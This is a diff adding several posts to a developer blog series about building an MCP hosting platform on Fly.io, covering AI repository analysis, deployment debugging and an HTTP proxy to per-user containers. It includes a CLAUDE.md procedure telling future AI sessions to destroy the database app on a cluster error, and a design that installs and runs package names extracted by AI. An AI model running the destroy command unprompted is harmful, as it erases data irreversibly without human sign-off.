+**Why PostgreSQL**: We already have it. Redis would be overkill for this scale.
+
+## Error Handling: When AI Fails
+
+AI fails. A lot. Here's how we handle it:
+
+```python
+try:
+ result = await self.analyze_repo(repo_url)
+except json.JSONDecodeError:
+ # AI returned non-JSON
+ raise AnalysisError(
+ message="AI analysis returned invalid format",
+ details={"response": content},
+ user_message="Analysis failed. Try again or contact support."
+ )
+except ValidationError as e:
+ # Pydantic validation failed (missing required fields)
+ raise AnalysisError(
+ message="Analysis missing required fields",
+ details={"errors": e.errors()},
+ user_message="Incomplete analysis. The repository might not be an MCP server."
+ )
+except Exception as e:
+ # Unexpected error
+ logger.exception("Analysis failed", extra={"repo_url": repo_url})
+ raise AnalysisError(
+ message="Analysis failed unexpectedly",
+ user_message="Something went wrong. Please try again."
+ )
+```
+
+**User-facing errors are key**. "ValidationError: 'package' field missing" means nothing to users. "This repository might not be an MCP server" helps them understand.
+
+## Real Examples: What It Extracts
+
+### Example 1: TickTick MCP Server
+
+Input: `https://github.com/hong-hao/mcp-ticktick`
+
+Output:
+```json
+{
+ "package": "@hong-hao/mcp-ticktick",
+ "name": "TickTick MCP Server",
+ "description": "MCP server for interacting with TickTick task management",
+ "env_vars": [
+ {
+ "name": "TICKTICK_TOKEN",
+ "description": "Your TickTick API access token",
+ "required": true,
+ "secret": true,
+ "default": null
+ }
+ ],
+ "tools": ["create_task", "list_tasks", "update_task", "delete_task"],
+ "resources": ["ticktick://tasks"],
+ "prompts": [],
+ "notes": "Requires TickTick account and API token"
+}
+```
+
+**Perfect extraction**. Frontend generates a form with one password field: "TICKTICK_TOKEN".
+
+### Example 2: Filesystem MCP Server
+
+Input: `https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem`
+
+Output:
+```json
+{
+ "package": "@modelcontextprotocol/server-filesystem",
+ "name": "Filesystem MCP Server",
+ "description": "MCP server for filesystem operations",
+ "env_vars": [
+ {
+ "name": "ALLOWED_DIRECTORIES",
+ "description": "Comma-separated list of allowed directories",
+ "required": true,
+ "secret": false,
+ "default": null
+ }
+ ],
+ "tools": ["read_file", "write_file", "list_directory", "create_directory"],
+ "resources": ["file://"],
+ "prompts": [],
+ "notes": "Security: Only allows access to whitelisted directories"
+}
+```
+
+**Also perfect**. Even extracted the security note.
+
+### Example 3: Analysis Failure
+
+Input: `https://github.com/user/random-repo` (not an MCP server)
+
+Output: `422 Validation Error: Package name not found`
+
+**Good failure mode**. User gets clear feedback that this isn't deployable.
+
+## The Frontend Integration
+
+When analysis succeeds, the frontend receives:
+
+```typescript
+const analysis = await analyzeRepo(repoUrl);
+
+// Render the analysis summary plus a dynamically generated credentials form.
+// (JSX reconstructed for illustration; the real component tree may differ.)
+return (
+  <div>
+    <h2>{analysis.name}</h2>
+    <p>{analysis.description}</p>
+    <CredentialsForm envVars={analysis.env_vars} />
+  </div>
+);
+```
+
+The `CredentialsForm` is dynamically generated (see Part 2) - no hardcoded forms, adapts to any MCP server.
+
+## Performance in Numbers
+
+After optimization:
+
+- **Average analysis time**: 3.2 seconds
+- **Token usage**: 4,000-8,000 tokens (vs 250k before optimization)
+- **Cost per analysis**: ~$0.01 (Claude Haiku pricing)
+- **Cache hit rate**: 73% (most users analyze popular repos)
+- **Failure rate**: 8% (repos that aren't MCP servers)
+
+**Cost savings from caching**: ~$0.007 per cached request. At 100 analyses/day: $0.70/day saved.
+
+## What I Learned
+
+### AI Excels At ✅
+- **Structured extraction** from semi-structured docs (READMEs)
+- **Pattern recognition** (identifying env var requirements)
+- **Schema compliance** (when prompted correctly)
+
+### AI Struggles With ❌
+- **Ambiguous documentation** (poorly written READMEs)
+- **Unconventional structures** (non-standard package.json)
+- **Edge cases** (monorepos, non-npm packages)
+
+### Human Judgment Required 🧠
+- **Prompt design** - AI can't write its own prompts (yet)
+- **Error handling** - What should happen when AI fails?
+- **Cost optimization** - Limiting results, caching strategy
+- **Security validation** - Is the extracted package name safe to execute?
+
+## Up Next
+
+The AI analysis engine works. We can extract MCP configuration from GitHub repos. Dynamic forms are generated.
+
+But it all runs on localhost. Time to **deploy to production**.
+
+That's Part 4: First Deployment - Fly.io Adventures.
+
+Spoiler: It doesn't go smoothly.
+
+---
+
+**Key Commits**:
+- `af021a1` - Frontend/backend flow implementation
+- `02f9346` - Comprehensive API hardening and analysis improvements
+- `d0766bf` - Fix analysis token overflow with `max_results: 2`
+
+**Related Files**:
+- `backend/app/services/analysis_service.py` - Analysis implementation
+- `backend/app/prompts/analysis_prompt.py` - The actual prompt
+- `backend/app/services/cache_service.py` - Caching logic
+
+**Next Post**: [Part 4: First Deployment - Fly.io Adventures](04-first-deployment-flyio.md)
diff --git a/blog/04-first-deployment-flyio.md b/blog/04-first-deployment-flyio.md
new file mode 100644
index 0000000..f593394
--- /dev/null
+++ b/blog/04-first-deployment-flyio.md
@@ -0,0 +1,475 @@
+---
+title: "Part 4: First Deployment - Fly.io Adventures"
+series: "Catwalk Live Development Journey"
+part: 4
+date: 2025-12-12
+updated: 2025-12-27
+tags: [deployment, fly.io, docker, postgresql, infrastructure, debugging]
+reading_time: "14 min"
+commits_covered: "5d1fb9f...f15370c"
+---
+
+## The Moment of Truth
+
+December 12, 2025. The application works perfectly on localhost:
+- Backend API responding at `localhost:8000`
+- Frontend rendering at `localhost:3000`
+- PostgreSQL running in Docker
+- Analysis works, forms generate, encryption encrypts
+
+It's time to **ship to production**.
+
+How hard could it be?
+
+## Attempt 1: The Naive Dockerfile
+
+AI (Claude Code) generated a Dockerfile:
+
+```dockerfile
+FROM python:3.12-slim
+
+WORKDIR /app
+
+COPY requirements.txt .
+RUN pip install -r requirements.txt
+
+COPY . .
+
+CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8080"]
+```
+
+I ran `fly deploy`. It built. It deployed. It... crashed immediately.
+
+```
+2025-12-12T14:23:01Z [error] ModuleNotFoundError: No module named 'openai'
+```
+
+**What happened**: `requirements.txt` was incomplete. The analysis service imported `openai` but it wasn't listed as a dependency.
+
+**The fix**: Add all missing dependencies:
+
+```txt
+# requirements.txt
+fastapi>=0.115.0
+uvicorn[standard]>=0.30.0
+sqlalchemy>=2.0.0
+alembic>=1.13.0
+psycopg[binary]>=3.1.0 # PostgreSQL driver
+cryptography>=41.0.0 # Fernet encryption
+pydantic>=2.0.0
+pydantic-settings>=2.0.0
+openai>=1.0.0 # For Claude API via OpenRouter
+httpx>=0.27.0 # HTTP client
+email-validator>=2.1.0 # Required by Pydantic EmailStr
+```
+
+**Lesson 1**: AI doesn't always track dependencies correctly. Always verify imports match requirements.
+
+## Attempt 2: The Database Connection Failure
+
+With dependencies fixed, the app started. Then:
+
+```
+2025-12-12T14:45:12Z [error] sqlalchemy.exc.ArgumentError:
+Could not parse SQLAlchemy URL from string 'postgres://...'
+```
+
+**Context**: Fly.io PostgreSQL provides URLs like:
+```
+postgres://user:pass@db-name.internal:5432/dbname?sslmode=disable
+```
+
+SQLAlchemy 2.0 with async requires:
+```
+postgresql+psycopg://user:pass@db-name.internal:5432/dbname
+```
+
+**The problem**: Driver mismatch. Fly gives `postgres://`, SQLAlchemy wants `postgresql+psycopg://`.
+
+**AI's first solution**: Use `asyncpg` driver.
+
+```python
+# ❌ AI suggested this
+DATABASE_URL = "postgresql+asyncpg://..."
+```
+
+Deployed. Crashed.
+
+```
+2025-12-12T15:10:33Z [error] asyncpg.exceptions.InvalidParameterValue:
+sslmode 'disable' is not supported
+```
+
+**The real problem**: Fly.io URLs include `?sslmode=disable`. The `asyncpg` driver doesn't support this parameter format.
+
+**The actual solution**: Use `psycopg3` and transform URLs.
+
+```python
+# backend/app/core/config.py
+from pydantic_settings import BaseSettings
+from pydantic import field_validator
+
+class Settings(BaseSettings):
+ DATABASE_URL: str
+
+ @field_validator("DATABASE_URL")
+ @classmethod
+ def fix_postgres_url(cls, v: str) -> str:
+ """
+ Convert Fly.io postgres:// URLs to SQLAlchemy format.
+
+ Fly.io: postgres://user:pass@host:5432/db?sslmode=disable
+ SQLAlchemy 2.0 async: postgresql+psycopg://user:pass@host:5432/db?sslmode=disable
+ """
+ if v.startswith("postgres://"):
+ return v.replace("postgres://", "postgresql+psycopg://", 1)
+ return v
+```
+
+**Why this works**: `psycopg3` supports all PostgreSQL SSL parameters. It's the modern, async-compatible driver.
+
+**Lesson 2**: Infrastructure details matter. AI suggested a driver that doesn't work with Fly.io's conventions.
+
+## Attempt 3: The Shell Script Disaster
+
+The app connected to the database! But database tables didn't exist.
+
+**Solution**: Run Alembic migrations on startup.
+
+AI generated:
+
+```dockerfile
+# ❌ AI's approach
+COPY docker-entrypoint.sh .
+RUN chmod +x docker-entrypoint.sh
+CMD ["./docker-entrypoint.sh"]
+```
+
+```bash
+#!/bin/bash
+# docker-entrypoint.sh
+alembic upgrade head
+uvicorn app.main:app --host 0.0.0.0 --port 8080
+```
+
+Deployed. Crashed.
+
+```
+2025-12-12T16:05:44Z [error] /bin/sh: ./docker-entrypoint.sh: not found
+```
+
+**What happened**: I created the shell script on Windows. Windows uses CRLF (`\r\n`) line endings. Linux expects LF (`\n`). The script was literally unreadable to the Linux container.
+
+**The fix**: Don't use shell scripts in Docker when developing on Windows.
+
+```dockerfile
+# ✅ Inline commands instead
+CMD ["sh", "-c", "alembic upgrade head && uvicorn app.main:app --host 0.0.0.0 --port 8080"]
+```
+
+**Even better**: Use Fly.io's `release_command` feature:
+
+```toml
+# fly.toml
+[deploy]
+ release_command = "alembic upgrade head"
+
+[http_service]
+ internal_port = 8080
+ force_https = true
+ auto_stop_machines = "off"
+ auto_start_machines = true
+ min_machines_running = 1
+```
+
+Now migrations run **before** deployment. If migrations fail, deployment aborts. Much safer.
+
+**Lesson 3**: Avoid shell scripts in Docker when cross-platform development is involved. Use native tooling.
+
+## Attempt 4: The Database Cluster Meltdown
+
+The app started successfully! Then, 6 hours later:
+
+```
+2025-12-12T22:34:12Z [error] psycopg.OperationalError:
+connection to server at "catwalk-db.internal" failed:
+no active leader found
+```
+
+**What happened**: Fly.io's single-node PostgreSQL clusters can enter a broken state where there's "no active leader." The cluster becomes completely unusable.
+
+**AI's suggestion**: Restart the database.
+
+```bash
+fly machines restart
+```
+
+Didn't work. Still broken.
+
+**The nuclear option** (from Fly.io docs):
+
+```bash
+# Destroy the broken cluster
+fly apps destroy catwalk-db
+
+# Create a fresh cluster
+fly postgres create --name catwalk-db-v2
+
+# Attach to backend
+fly postgres attach catwalk-db-v2 --app catwalk-backend
+```
+
+**Result**: New database, clean slate, working again.
+
+**Data loss**: Everything. But this was day 2 of development with no real users, so... acceptable.
+
+**Lesson 4**: Fly.io single-node databases are fragile. For production, use multi-node clusters or managed PostgreSQL (e.g., Supabase, Neon).
+
+**Long-term solution**: We documented the recovery procedure in `CLAUDE.md` so future AI sessions (and humans) know what to do:
+
+```markdown
+## Fly.io Postgres Cluster Recovery
+
+If you see "no active leader found":
+
+1. Don't try to repair - faster to recreate
+2. `fly apps destroy <db-app-name>` (accepts data loss)
+3. `fly postgres create --name <new-db-name>`
+4. `fly postgres attach <new-db-name> --app <backend-app-name>`
+5. Run migrations: `fly ssh console` → `alembic upgrade head`
+```
+
+## The Successful Deployment
+
+December 12, late evening. After fixing:
+- ✅ Missing dependencies
+- ✅ Database driver (asyncpg → psycopg3)
+- ✅ URL transformation
+- ✅ Shell script line endings
+- ✅ Database cluster recreation
+
+The deployment succeeded:
+
+```bash
+fly status --app catwalk-backend
+
+ID = catwalk-backend
+Status = running
+Hostname = catwalk-backend.fly.dev
+Platform = machines
+Region = sjc (San Jose)
+Machines = 1 (1 running)
+
+VM Resources:
+ CPUs: 1x shared
+ Memory: 512 MB
+```
+
+**The moment**: `curl https://catwalk-backend.fly.dev/api/health`
+
+```json
+{"status": "healthy"}
+```
+
+**Pure joy**. The backend was live.
+
+## The Dockerfile (Final Version)
+
+```dockerfile
+# Use official Python runtime
+FROM python:3.12-slim
+
+# Set working directory
+WORKDIR /app
+
+# Install system dependencies
+RUN apt-get update && apt-get install -y \
+ gcc \
+ postgresql-client \
+ && rm -rf /var/lib/apt/lists/*
+
+# Copy requirements first (layer caching)
+COPY requirements.txt .
+
+# Install Python dependencies
+RUN pip install --no-cache-dir -r requirements.txt
+
+# Copy application code
+COPY . .
+
+# Expose port (documentation only, Fly.io uses internal_port from fly.toml)
+EXPOSE 8080
+
+# Run uvicorn (migrations handled by release_command)
+CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8080"]
+```
+
+**Key elements**:
+- `python:3.12-slim` - Smaller image
+- System dependencies in one RUN - fewer layers
+- `requirements.txt` copied first - Docker layer caching
+- No shell scripts - just `uvicorn`
+
+## The Fly.io Configuration
+
+```toml
+# fly.toml
+app = "catwalk-backend"
+primary_region = "sjc"
+
+[build]
+ dockerfile = "Dockerfile"
+
+[deploy]
+ release_command = "alembic upgrade head"
+
+[env]
+ PORT = "8080"
+ PUBLIC_URL = "https://catwalk-backend.fly.dev"
+
+[http_service]
+ internal_port = 8080
+ force_https = true
+ auto_stop_machines = "off"
+ auto_start_machines = true
+ min_machines_running = 1
+
+[[vm]]
+ cpu_kind = "shared"
+ cpus = 1
+ memory_mb = 512
+```
+
+**Configuration decisions**:
+
+- **`auto_stop_machines = "off"`**: Backend stays running 24/7. No cold starts.
+- **`min_machines_running = 1`**: Always one instance running.
+- **`release_command`**: Migrations before deployment (safer).
+- **`force_https`**: All HTTP → HTTPS redirects.
+- **512MB RAM**: Plenty for FastAPI + SQLAlchemy.
+
+## Secrets Management
+
+Fly.io secrets are environment variables encrypted at rest:
+
+```bash
+# Set secrets (never commit these!)
+fly secrets set \
+ DATABASE_URL="postgresql+psycopg://..." \
+ ENCRYPTION_KEY="$(python -c 'from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())')" \
+ OPENROUTER_API_KEY="sk-or-..." \
+ AUTH_SECRET="$(openssl rand -base64 32)" \
+ --app catwalk-backend
+```
+
+**Secrets set this way**:
+- Encrypted at rest
+- Available as environment variables in the app
+- Not logged
+- Rotatable (set new value, old value overwritten)
+
+**What we learned**: Never log secrets. Never return secrets in API responses. Decrypt only in memory.
+
+## Database Setup
+
+```bash
+# Create PostgreSQL cluster
+fly postgres create \
+ --name catwalk-db \
+ --region sjc \
+ --vm-size shared-cpu-1x \
+ --volume-size 10
+
+# Attach to backend (sets DATABASE_URL automatically)
+fly postgres attach catwalk-db --app catwalk-backend
+```
+
+**Attachment benefits**:
+- `DATABASE_URL` secret automatically set
+- Uses Fly.io internal DNS (`.internal`)
+- No public internet exposure
+
+**Database specs**:
+- PostgreSQL 15
+- 10GB volume
+- Shared CPU (free tier)
+- Single node (fragile, but fine for MVP)
+
+## The Cost Reality
+
+Running on Fly.io:
+
+| Resource | Specs | Monthly Cost |
+|----------|-------|--------------|
+| Backend VM | 512MB, shared CPU, always-on | ~$1.94 |
+| PostgreSQL | 10GB, single-node | $0 (free tier) |
+| **Total** | | **~$1.94/month** |
+
+Cheaper than a coffee. **Production infrastructure for $2/month**.
+
+## Monitoring & Debugging
+
+```bash
+# Real-time logs
+fly logs --app catwalk-backend
+
+# Check app status
+fly status --app catwalk-backend
+
+# SSH into container (debugging)
+fly ssh console --app catwalk-backend
+
+# Database console
+fly postgres connect --app catwalk-db
+```
+
+**Log watching became a habit**. Every deploy: `fly logs` in a terminal, watch for errors.
+
+## What Worked vs What Didn't
+
+### AI-Generated Code That Worked ✅
+- FastAPI app structure
+- Pydantic models
+- Database migrations (Alembic)
+- Environment variable configuration
+
+### AI-Generated Code That Failed ❌
+- Database driver choice (asyncpg)
+- Shell script approach (CRLF issues)
+- Dependency tracking (missing packages)
+- Error handling (too generic)
+
+### Human Intervention Required 🧠
+- PostgreSQL driver debugging
+- Fly.io-specific configuration
+- Database cluster recovery
+- Secrets management strategy
+
+**The pattern**: AI handles **known patterns** well. AI fails at **infrastructure quirks** and **platform-specific issues**.
+
+## Up Next
+
+The backend is deployed. The database is running. The health endpoint responds.
+
+But the platform doesn't **do** anything yet. We can analyze repos, but we can't deploy MCP servers.
+
+Time to build the core: **Streamable HTTP and MCP Machines**.
+
+That's Part 5: Implementing Streamable HTTP & MCP Machines.
+
+---
+
+**Key Commits**:
+- `5d1fb9f` - Enable backend production deployment to Fly.io
+- `f15370c` - Backend: deploy Fly MCP machines + Streamable HTTP bridge
+
+**Related Files**:
+- `backend/Dockerfile` - Production container
+- `backend/fly.toml` - Fly.io configuration
+- `backend/app/core/config.py` - Database URL transformer
+
+**Debugging Resources**:
+- `CLAUDE.md` - Deployment pitfalls and solutions
+- `context/CURRENT_STATUS.md` - Database recovery procedures
+
+**Next Post**: [Part 5: Implementing Streamable HTTP & MCP Machines](05-streamable-http-mcp-machines.md)
diff --git a/blog/05-streamable-http-mcp-machines.md b/blog/05-streamable-http-mcp-machines.md
new file mode 100644
index 0000000..d5dc921
--- /dev/null
+++ b/blog/05-streamable-http-mcp-machines.md
@@ -0,0 +1,557 @@
+---
+title: "Part 5: Implementing Streamable HTTP & MCP Machines"
+series: "Catwalk Live Development Journey"
+part: 5
+date: 2025-12-14
+updated: 2025-12-27
+tags: [MCP, streamable-http, fly-machines, protocol, networking]
+reading_time: "16 min"
+commits_covered: "f1b3e68...0bdfc23"
+---
+
+## The Core Mission
+
+We have a deployed backend. We can analyze GitHub repos. We can encrypt credentials. But we can't actually **run MCP servers yet**.
+
+This is the moment where Catwalk Live goes from "interesting idea" to "working platform."
+
+**The goal**: When a user creates a deployment, spin up an isolated Fly.io container running their MCP server, and expose it as a Streamable HTTP endpoint that Claude Desktop can connect to.
+
+Sounds simple. It wasn't.
+
+## Understanding the MCP Protocol
+
+First, I needed to deeply understand the Model Context Protocol (MCP).
+
+**MCP in 30 seconds**:
+- **Purpose**: Let AI assistants (like Claude) call tools, access resources, and use prompts from external servers
+- **Architecture**: Client-server protocol with JSON-RPC 2.0 messages
+- **Transport**: Originally stdio (standard input/output), then SSE (Server-Sent Events), now **Streamable HTTP**
+
+**The transport evolution**:
+1. **stdio** (2024): Claude runs MCP server as subprocess, communicates via stdin/stdout
+2. **SSE** (2024-11-05): Separate GET `/sse` (server → client events) and POST `/messages` (client → server requests)
+3. **Streamable HTTP** (2025-06-18): **Single unified endpoint**, GET and POST both to `/mcp`, with session management
+
+**Why Streamable HTTP**:
+- Simpler (one endpoint vs two)
+- Better for proxying (no need to coordinate SSE + POST)
+- Session-based (reconnection without reinitialization)
+- More flexible (supports both streaming and non-streaming responses)
+
+**The spec I implemented**: [MCP 2025-06-18 Streamable HTTP](https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#streamable-http)
+
+## The Architecture
+
+Here's how requests flow:
+
+```
+┌──────────────────┐
+│ Claude Desktop │ User: "What are my TickTick tasks?"
+└────────┬─────────┘
+ │ POST /mcp
+ │ MCP-Protocol-Version: 2025-06-18
+ │ MCP-Session-Id: <session-id>
+ │ {jsonrpc: "2.0", method: "tools/call", params: {...}}
+ ↓
+┌─────────────────────────────────────┐
+│ Catwalk Backend (FastAPI) │
+│ https://backend.fly.dev/api/mcp/{id}│
+│ - Validates access token │
+│ - Retrieves deployment record │
+│ - Proxies to MCP machine │
+└────────┬────────────────────────────┘
+ │ POST /mcp
+ │ (over Fly.io private network)
+ │ http://{machine_id}.vm.mcp-host.internal:8080/mcp
+ ↓
+┌─────────────────────────────────────┐
+│ MCP Machine (Fly.io Container) │
+│ - mcp-proxy (HTTP ↔ stdio) │
+│ - npx @hong-hao/mcp-ticktick │
+│ - Env: TICKTICK_TOKEN=<decrypted> │
+└────────┬────────────────────────────┘
+ │ stdio communication
+ │ JSON-RPC messages
+ ↓
+ MCP Server executes tool
+ Returns result via stdout
+ ↓
+ mcp-proxy converts to HTTP response
+ ↓
+ Backend proxies response to Claude
+ ↓
+ Claude synthesizes answer for user
+```
+
+**Key insight**: The user sees one endpoint. Behind the scenes, requests flow through multiple systems.
+
+## Implementing the MCP Endpoint
+
+### The Streamable HTTP Handler
+
+```python
+# backend/app/api/mcp_streamable.py
+import uuid
+
+import httpx
+from fastapi import APIRouter, Header, HTTPException, Request, Response
+
+router = APIRouter()
+
+@router.api_route(
+ "/mcp/{deployment_id}",
+ methods=["GET", "POST"],
+ response_class=Response
+)
+async def mcp_streamable(
+ deployment_id: str,
+ request: Request,
+ access_token: str = Header(None, alias="X-Access-Token")
+):
+ """
+ MCP Streamable HTTP endpoint (2025-06-18 spec).
+
+ Supports:
+ - Protocol version negotiation (2025-06-18, 2025-03-26, 2024-11-05)
+ - Session management (Mcp-Session-Id header)
+ - JSON-RPC 2.0 (requests and notifications)
+ - Streaming responses (server-sent events via text/event-stream)
+ """
+
+ # 1. Validate access token
+ deployment = await get_deployment(deployment_id)
+ if deployment.access_token != access_token:
+ raise HTTPException(401, "Invalid access token")
+
+ # 2. Get protocol version from headers
+ protocol_version = request.headers.get("Mcp-Protocol-Version", "2025-06-18")
+
+ # 3. Get or create session ID
+ session_id = request.headers.get("Mcp-Session-Id") or str(uuid.uuid4())
+
+ # 4. Proxy to MCP machine
+ machine_url = f"http://{deployment.machine_id}.vm.mcp-host.internal:8080/mcp"
+
+ # Forward request to MCP machine
+ async with httpx.AsyncClient() as client:
+ # GET request: Initialization or session resumption
+ if request.method == "GET":
+ response = await client.get(
+ machine_url,
+ headers={
+ "Accept": "application/json",
+ "Mcp-Protocol-Version": protocol_version,
+ "Mcp-Session-Id": session_id
+ }
+ )
+
+ # POST request: JSON-RPC call
+ else:
+ body = await request.body()
+ response = await client.post(
+ machine_url,
+ content=body,
+ headers={
+ "Content-Type": "application/json",
+ "Mcp-Protocol-Version": protocol_version,
+ "Mcp-Session-Id": session_id
+ }
+ )
+
+ # 5. Return response (preserving headers and streaming if applicable)
+ return Response(
+ content=response.content,
+ status_code=response.status_code,
+ headers=dict(response.headers),
+ media_type=response.headers.get("content-type")
+ )
+```
+
+**Key elements**:
+
+1. **Dual method support**: Same endpoint handles GET (init) and POST (calls)
+2. **Protocol version**: Respects `Mcp-Protocol-Version` header
+3. **Session management**: Persists `Mcp-Session-Id` across requests
+4. **Access control**: Validates deployment-specific token
+5. **Proxying**: Forwards to Fly machine over private network
+
+### Protocol Version Negotiation
+
+The MCP spec evolved. Clients might request older versions:
+
+```python
+SUPPORTED_VERSIONS = ["2025-06-18", "2025-03-26", "2024-11-05"]
+
+def validate_protocol_version(requested: str) -> str:
+    """
+    Negotiate the protocol version.
+
+    Returns the requested version if we support it; otherwise
+    falls back to the latest version we speak.
+    """
+    if requested in SUPPORTED_VERSIONS:
+        return requested
+
+    # Client requests an unknown version - answer with the latest we support
+    return "2025-06-18"
+```
+
+**Why version negotiation**: Future-proofing. When MCP 2026 spec comes out, Catwalk can still serve 2025 clients.
+
+### Session Management
+
+Sessions let clients reconnect without reinitialization:
+
+```python
+from datetime import datetime, timedelta
+from typing import Dict
+
+# MCPSession: a small dataclass (id, deployment_id, created_at) defined elsewhere
+class SessionManager:
+    """In-memory session store (TODO: Redis for multi-instance)"""
+
+ def __init__(self):
+ self.sessions: Dict[str, MCPSession] = {}
+
+ async def get_or_create(self, session_id: str, deployment_id: str) -> MCPSession:
+ """Get existing session or create new one"""
+ if session_id not in self.sessions:
+ self.sessions[session_id] = MCPSession(
+ id=session_id,
+ deployment_id=deployment_id,
+ created_at=datetime.utcnow()
+ )
+ return self.sessions[session_id]
+
+ async def cleanup_expired(self, max_age: timedelta = timedelta(hours=1)):
+ """Remove sessions older than max_age"""
+ now = datetime.utcnow()
+ self.sessions = {
+ sid: session
+ for sid, session in self.sessions.items()
+ if (now - session.created_at) < max_age
+ }
+```
+
+**Trade-off**: In-memory sessions work for single-instance deployments. For multi-instance, need Redis or sticky sessions.
+
+## Building the MCP Machine
+
+The MCP machine is a Fly.io container running:
+1. **mcp-proxy**: HTTP ↔ stdio adapter
+2. **User's MCP server**: Installed dynamically via npm/pip
+
+### The Machine Image
+
+```dockerfile
+# deploy/Dockerfile (mcp-proxy image)
+FROM node:20-slim
+
+# Install Python (supports both npm and PyPI MCP servers)
+RUN apt-get update && apt-get install -y python3 python3-pip
+
+# Install mcp-proxy globally
+RUN npm install -g @modelcontextprotocol/proxy
+
+# Expose port
+EXPOSE 8080
+
+# Start mcp-proxy with dynamic package
+# MCP_PACKAGE env var set by deployment
+CMD npx -y $MCP_PACKAGE | mcp-proxy http --port 8080
+```
+
+**How it works**:
+1. `npx -y $MCP_PACKAGE` - Installs and runs the MCP server package
+2. `| mcp-proxy http` - Pipes stdout to mcp-proxy, which:
+ - Listens on HTTP port 8080
+ - Converts HTTP requests → JSON-RPC messages → MCP server stdin
+ - Converts MCP server stdout → JSON-RPC responses → HTTP responses
+
+**Why this architecture**:
+- Generic: Works with ANY MCP server (npm or PyPI)
+- Isolated: Each deployment gets its own container
+- Secure: No shared state between deployments
+
+### Deploying a Machine
+
+```python
+# backend/app/services/fly_deployment_service.py
+from typing import Dict
+
+import httpx
+
+class FlyDeploymentService:
+ """Deploy MCP servers to Fly.io Machines"""
+
+ def __init__(self, api_token: str, mcp_image: str):
+ self.api_token = api_token
+ self.mcp_image = mcp_image # e.g., "registry.fly.io/mcp-host:latest"
+ self.base_url = "https://api.machines.dev/v1"
+
+ async def create_machine(
+ self,
+ app_name: str,
+ deployment_id: str,
+ mcp_package: str,
+ credentials: Dict[str, str]
+ ) -> str:
+ """
+ Create a Fly machine running the MCP server.
+
+ Returns:
+ machine_id: Fly machine ID
+ """
+
+ # Construct environment variables
+ env = {
+ "MCP_PACKAGE": mcp_package, # e.g., "@hong-hao/mcp-ticktick"
+ **credentials # e.g., {"TICKTICK_TOKEN": "..."}
+ }
+
+ # Machine configuration
+ config = {
+ "name": f"mcp-{deployment_id[:8]}",
+ "config": {
+ "image": self.mcp_image,
+ "env": env,
+ "guest": {
+ "cpu_kind": "shared",
+ "cpus": 1,
+ "memory_mb": 256 # Tiny - MCP servers are lightweight
+ },
+ "restart": {
+ "policy": "always" # Auto-restart if crashed
+ },
+ "services": [{
+ "ports": [{
+ "port": 8080,
+ "handlers": ["http"]
+ }],
+ "protocol": "tcp",
+ "internal_port": 8080
+ }]
+ }
+ }
+
+ # Create machine via Fly.io API
+ async with httpx.AsyncClient() as client:
+ response = await client.post(
+ f"{self.base_url}/apps/{app_name}/machines",
+ json=config,
+ headers={
+ "Authorization": f"Bearer {self.api_token}",
+ "Content-Type": "application/json"
+ }
+ )
+
+ response.raise_for_status()
+ data = response.json()
+ return data["id"] # machine_id
+```
+
+**Machine specs**:
+- 256MB RAM (MCP servers are tiny)
+- Shared CPU (no need for dedicated)
+- Auto-restart policy (survive crashes)
+- Internal port 8080 (Fly private network)
+
+**Cost**: ~$0.65/month per always-on machine. Cheap.
+
+## The Fly.io Private Network Challenge
+
+**The problem**: Fly machines have internal DNS: `{machine_id}.vm.{app_name}.internal`
+
+Backend needs to reach machines, but:
+- Machines are on Fly's private network (`.internal` TLD)
+- Backend needs to be in the same Fly network
+- DNS resolution must work
+
+**The solution**: Deploy backend and machines in the same Fly organization and region.
+
+```toml
+# backend/fly.toml
+app = "catwalk-backend"
+primary_region = "sjc"
+
+# MCP machines also deployed to sjc region
+```
+
+**Private network connectivity**:
+
+```python
+# This works from within Fly.io network:
+machine_url = f"http://{machine_id}.vm.mcp-host.internal:8080/mcp"
+
+# This would NOT work from outside Fly:
+# machine_url = f"http://{machine_id}.fly.dev/mcp" # Public DNS doesn't exist
+```
+
+**Debugging tip**: SSH into backend and test connectivity:
+
+```bash
+fly ssh console --app catwalk-backend
+# Inside container:
+curl http://<machine-id>.vm.mcp-host.internal:8080/status
+```
+
+## The Header That Stumped Me
+
+December 14, 10 PM. Machines are running. Backend is proxying. But Claude can't connect.
+
+**Error**: `406 Not Acceptable`
+
+I tested the machine directly:
+
+```bash
+curl http://{machine_id}.vm.mcp-host.internal:8080/mcp
+
+# Response: 406 Not Acceptable
+```
+
+**What happened**: `mcp-proxy` requires an `Accept` header:
+
+```bash
+curl -H "Accept: application/json" \
+ http://{machine_id}.vm.mcp-host.internal:8080/mcp
+
+# Response: 200 OK
+```
+
+**The fix**: Always include `Accept` header in proxied requests:
+
+```python
+response = await client.get(
+ machine_url,
+ headers={
+ "Accept": "application/json", # REQUIRED
+ "Mcp-Protocol-Version": protocol_version,
+ "Mcp-Session-Id": session_id
+ }
+)
+```
+
+**Lesson learned**: Read the spec carefully. `mcp-proxy` HTTP transport spec says:
+
+> Clients SHOULD send `Accept: application/json` header.
+
+"SHOULD" means "required in practice."
+
+## End-to-End Test
+
+December 14, 11 PM. Time to test the full flow:
+
+### Step 1: Create Deployment
+
+```bash
+POST /api/deployments
+{
+ "name": "My TickTick",
+ "repo_url": "https://github.com/hong-hao/mcp-ticktick",
+ "credentials": {
+ "TICKTICK_TOKEN": "my-secret-token"
+ }
+}
+
+Response:
+{
+ "id": "123e4567-e89b-12d3-a456-426614174000",
+ "connection_url": "https://backend.fly.dev/api/mcp/123e4567-e89b-12d3-a456-426614174000",
+ "access_token": "abc123...",
+ "status": "running",
+ "machine_id": "e2865013d24908"
+}
+```
+
+### Step 2: Add to Claude Desktop
+
+Edit `claude_desktop_config.json`:
+
+```json
+{
+ "mcpServers": {
+ "ticktick": {
+ "url": "https://backend.fly.dev/api/mcp/123e4567-e89b-12d3-a456-426614174000",
+ "transport": {
+ "type": "streamableHttp",
+ "headers": {
+ "X-Access-Token": "abc123..."
+ }
+ }
+ }
+ }
+}
+```
+
+### Step 3: Test in Claude
+
+**User**: "What are my TickTick tasks for today?"
+
+**Claude**: *(connects to the MCP endpoint and issues a `tools/call` request for `list_tasks`)*
+
+**Result**: ✅ Works! Claude lists actual TickTick tasks.
+
+**The moment**: Pure elation. The entire platform works end-to-end.
+
+## Performance Metrics
+
+After successful deployment:
+
